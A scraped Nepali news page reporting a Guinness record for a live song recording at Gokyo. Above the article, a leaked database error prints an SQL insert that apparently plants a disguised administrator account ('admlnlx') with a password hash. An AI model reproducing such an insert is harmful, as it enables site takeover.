WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlMAVlt2yjDQAcZYTCLjRZvQO2ZBlt/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 11:47:18', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुका तीन जना युवाले नाम लेखाए गिनिजबुकमा – Gaule Khabar

सोलुखुम्बुका तीन जना युवाले नाम लेखाए गिनिजबुकमा

सोलुखुम्बुका तीन जना युवाले नाम लेखाए गिनिजबुकमा

काठमाण्डौ । सोलुखुम्बुका तीन युवाहरु सहित पाँच नेपाली युवाहरुले एउटा विश्व कीर्तिमान नेपालको तर्फबाट थप्न सफल भएका छन् । नेपाली कलाकार टोलि सहित विश्वको अहिलेसम्मकै अग्लो स्थानमा अडियो तथा भिडियो छायांकन गरि गिनिज बुकमा नाम दर्ता गराएका हुन् । पर्यटन क्षेत्रको उद्गम थलो सोलुखुम्बुको गोक्यो ४८१३ मिटरको उचाईमा पहिलो पटक कलाकारहरुले लाईभ बाजा सहित गोक्यो री गीत लाईभ अडियो र भिडियो छायांकन गरेका हो ।

गोक्यो रि गीतको गीतकार मिलन किराँती, स्वर बबिना किराँती, संगीत बिक्रम राई,संगीत संयोजन फनिन्द्र राई र अडियो रेकर्डिङ वरिष्ठ साउन्ड ईन्जिनियर छिरिङ भोटेले गरेका हुन। म्युजिक भिडियो दुर्लभ जन्तरे बुद्धि राज राई को निर्देशन, गायिका तथा मोडेल बबिना किराँती, मोडल अनिश सिङ्जाली मगर, बाल कलाकार १० वर्षीय रायल राईलाई देख्न सकिनेछ भने म्युजिक भिडियोको छायांकन तथा सम्पादन ईशक जबेगुले गरेका हुन् । दुर्गा प्रसाद राईले सहयोगी छायांकनको भुमिका खेलेका थिए। त्यस्तै लाईभ बद्यबादनमा बिक्रम राईले मादल, राजिब बैजुले गिटार, बिक्रम गुरुङले अक्टाप्याड र पावल राईले बासुरी बजाएका हुन् ।

गीत नेपालको पर्यटन क्षेत्रलाई लक्षित गरि पर्यटन ब्यबसायी समेत रहेका निर्माता एवम् युवा समाजसेवी लक्ष्मण कार्की, पर्यटन व्यवसायी सन्च बहादुर राई, कार्यक्रमका संयोजक तथा तीन पटकसम्म विश्व कीर्तिमान गर्न सफल पुष्कर नेपाल, संचारकर्मी तथा सिनेमाटोग्राफर राजन खरेल, र चर्चित कार्यक्रम ईन्द्रेणी कार्यक्रमका बासुरी बाधक पावल राईले निर्माण गरेका हुन् ।

निर्माता समेत रहेका लक्षमण कार्की, सन्च बहादुर राई, पावल राई सोलुखुम्बुका हुन भने पुष्कर नेपाल सिन्धुपाल्चोक र राजन खरेल काभ्रेका हुन। गिनिजले पाँच जना निर्माता टोलिलाई रेकर्ड होल्डरको प्रमाणपत्र उपलब्ध गराउने छ। भने बाकी सबैलाई वर्ल्ड रेकर्ड पार्टिसिपेट सर्टिफिकेट उपलब्ध गराउने छ। अब केही समय पश्चात औपचारिक कार्यक्रम बिच विश्व कीर्तिमानको प्रमाणपत्र प्राप्त हुने निर्माता लक्ष्मण कार्कीले जानकारी दिए।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका